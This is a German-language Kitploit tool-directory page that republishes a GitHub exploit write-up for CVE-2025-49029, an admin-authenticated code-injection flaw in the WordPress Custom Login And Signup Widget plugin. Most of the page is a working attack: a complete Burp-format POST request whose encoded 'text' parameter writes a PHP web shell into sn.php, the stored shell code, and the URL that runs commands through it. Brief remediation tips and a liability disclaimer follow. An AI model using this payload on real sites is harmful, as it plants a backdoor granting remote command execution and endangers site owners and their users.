Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-49029 — WordPress Custom Login And Signup Widget Plugin <= 1.0 ist anfällig für Arbitrary Code Execution | Kitploit
Tools/GitHubGitHub/nxploited/cve-2025-49029
SchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubnxploited/cve-2025-49029

CVE-2025-49029

WordPress Custom Login And Signup Widget Plugin <= 1.0 ist anfällig für Arbitrary Code Execution

Repository anzeigen
2vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🚨 WordPress Custom Login And Signup Widget Plugin <= 1.0 - Beliebige Codeausführung (RCE)

🐞 Zusammenfassung der Schwachstelle

Unsachgemäße Kontrolle der Codegenerierung ('Code Injection') Schwachstelle im bitto.Kazi Custom Login And Signup Widget ermöglicht beliebige PHP-Codeausführung durch authentifizierte Administratoren.
Dieses Problem betrifft alle Versionen bis einschließlich 1.0.

🔥 Basis-Score: 9.1 (KRITISCH)
CWE-ID: CWE-94 – Unsachgemäße Kontrolle der Codegenerierung ('Code Injection')


🧠 Beschreibung

Das Plugin erlaubt Administratoren, den Inhalt von sn.php über das Feld Sender’s Name in den Einstellungen zu ändern.
Die vom Benutzer bereitgestellten Eingaben werden direkt in eine PHP-Datei geschrieben, ohne Bereinigung oder Validierung.

Daher wird jeder PHP-Code, der im Parameter text übergeben wird, in eine PHP-Datei gespeichert und bei direktem Zugriff ausgeführt, was zu Remote Code Execution (RCE) führt.


📍 Angreifbarer Endpunkt

root@kitploit:~
/wp-admin/options-general.php?page=custom-login-and-signup-widget&editbn1=yes

📥 Anfrage (Burp Suite Format)

root@kitploit:~
POST /wp-admin/options-general.php?page=custom-login-and-signup-widget&editbn1=yes HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://target.com/wp-admin/options-general.php?page=custom-login-and-signup-widget
Content-Type: application/x-www-form-urlencoded
Content-Length: 121
Origin: http://target.com
Connection: keep-alive
Cookie: *<insert your admin cookie here>*
Upgrade-Insecure-Requests: 1
Priority: u=0, i

text=%3C%3Fphp+if%28isset%28%24_GET%5B%27cmd%27%5D%29%29+system%28%24_GET%5B%27cmd%27%5D%29%3B+%3F%3E&submit=Submit

💉 Injektionsstelle

  • Parameter: text
  • Typ: POST
  • Erforderliche Rolle: Administrator
  • Betroffene Datei: sn.php (Plugin-Konfiguration include)

🧬 Injizierter Inhalt, gespeichert in Datei

root@kitploit:~
<?php
global $bwbn;
if(isset($_GET['cmd'])) system($_GET['cmd']);
?>

📁 Geschriebene Datei:

root@kitploit:~
http://target.com/wp-content/plugins/custom-login-and-signup-widget/content/sn.php

Nach erfolgreicher Injektion kann die Datei direkt aufgerufen werden, um Befehle auszuführen via:

root@kitploit:~
http://target.com/wp-content/plugins/custom-login-and-signup-widget/content/sn.php?cmd=id

🛡️ Empfehlungen

  • Beschränken Sie Datei-Schreibvorgänge.
  • Bereinigen und validieren Sie alle Eingaben, bevor Sie in PHP-Dateien schreiben.
  • Erlauben Sie niemals dynamische Inhalte, die in .php-Dateien geschrieben werden.

⚠️ Haftungsausschluss

Dieses Projekt dient ausschließlich zu Bildungs- und Forschungszwecken.
Jegliche Nutzung der bereitgestellten Informationen erfolgt auf eigenes Risiko.
Der Autor übernimmt keine Haftung für Missbrauch oder Schäden, die durch diesen Inhalt verursacht werden.


✍️ Von: Khaled_Alenazi (Nxploited)

Tool herunterladen